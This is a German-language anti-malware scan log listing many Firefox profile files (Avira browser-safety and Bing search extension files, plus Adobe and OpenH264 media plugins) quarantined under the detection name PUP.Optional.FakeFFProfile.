PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\blocked\message.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\blocked-count.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\Carousel.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\Classification.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\close_indicator.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\faq.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\Feedback.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\FeedbackLink.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\help.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\SearchClassification.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\Settings.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\Trackers.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\PUA\alternatives.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\PUA\PUA.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\PUA\PUAPage.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\PUA\SearchPUA.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\IndicatorBar\Classification.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\IndicatorBar\Close.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\IndicatorBar\Dash.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\IndicatorBar\Domain.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\IndicatorBar\Feedback.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\IndicatorBar\PUA.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\IndicatorBar\PUAPage.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\IndicatorBar\SearchClassification.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\IndicatorBar\SearchPUA.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\IndicatorBar\Settings.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\IndicatorBar\Trackers.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Tour\Classification.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Tour\Feedback.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Tour\HowToEditTrackers.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Tour\Offers.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Tour\TinyTopViewTour.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Tour\Trackers.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\i18n\de-DE.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\i18n\en-US.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\i18n\es-ES.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\i18n\fr-FR.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\i18n\it-IT.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\i18n\pt-BR.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\avira_logo.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\close.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\expand-arrow.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\absb-attention.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\absb-checks.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\absb-close.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\abs_avira_umbrella_white.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\avira_icon128.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\avira_icon16.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\avira_icon24.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\avira_icon32.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\avira_icon48.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\avira_logo.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\avira_logo32.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\classification_safe.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\classification_safe_lg.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\classification_unsafe.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\classification_unsafe_lg.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\close-offers-bar.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\dash_close.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\dash_close_white.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\dash_feedback.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\dash_search_dark.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\dash_search_dark.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\dash_search_light.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\dash_search_light.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\dash_search_normal.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\info_empty.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\info_full.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\pua-icon.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\question-mark.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\scroll-down.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\serp_info_safe.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\serp_info_unsafe.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\serp_info_warning.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\settings-24.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\switch-on.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\trackers_icon.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\trackers_icon_nb.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\warning.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\white_check.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\js\blocked.js, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\js\init.js, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\js\background\background.js, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\js\content\app.js, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\js\content\content.js, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\js\content\locale.js, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\js\content\search\search.js, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\tests\reports\junitresults.xml, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\tests\unit\index.html, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales\de\messages.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales\en\messages.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales\en_US\messages-sim.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales\en_US\messages.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales\es\messages.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales\fr\messages.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales\it\messages.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales\pt_BR\messages.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\bingsearch.full@microsoft.com\bootstrap.js, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\bingsearch.full@microsoft.com\chrome.manifest, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\bingsearch.full@microsoft.com\icon.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\bingsearch.full@microsoft.com\install.rdf, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\bingsearch.full@microsoft.com\search-settings.jsm, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\gmp-eme-adobe\12\eme-adobe.dll, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\gmp-eme-adobe\12\eme-adobe.info, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\gmp-eme-adobe\12\eme-adobe.voucher, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\gmp-gmpopenh264\1.5.1\gmpopenh264.dll, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
